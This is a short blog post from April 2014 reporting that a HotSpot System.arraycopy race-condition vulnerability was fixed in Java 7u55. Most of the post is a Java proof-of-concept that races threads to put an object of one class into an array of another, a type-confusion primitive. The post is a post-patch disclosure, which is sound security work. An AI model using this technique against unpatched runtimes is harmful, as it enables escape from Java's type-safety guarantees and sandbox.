# Wednesday, April 16, 2014
« IKVM.NET 7.4 Release Candidate 0 | Main | Java Method Overriding Is FUBAR Part 9 o... »
Arraycopy HotSpot Vulnerability Fixed in 7u55

Here is a simple PoC exploit for the issue fixed here:

class Union1 { }
class Union2 { }

class arraytoctou {
  static volatile Union1 u1 = new Union1();

  public static void main(String[] args) {
    final Union1[] arr1 = new Union1[1];
    final Union2[] arr2 = new Union2[1];
    new Thread() {
      public void run() {
        for(;;) {
          try {
            System.arraycopy(arr1, 0, arr2, 0, 1);
            if (arr2[0] != null) break;
          } catch (Exception _) { }
        }
      }
    }.start();

    while (arr2[0] == null) {
      arr1[0] = null;
      arr1[0] = u1;
    }

    System.out.println(arr2[0]);
  }
}

Wednesday, April 16, 2014 10:40:19 AM (W. Europe Daylight Time, UTC+02:00)  #    Comments [2]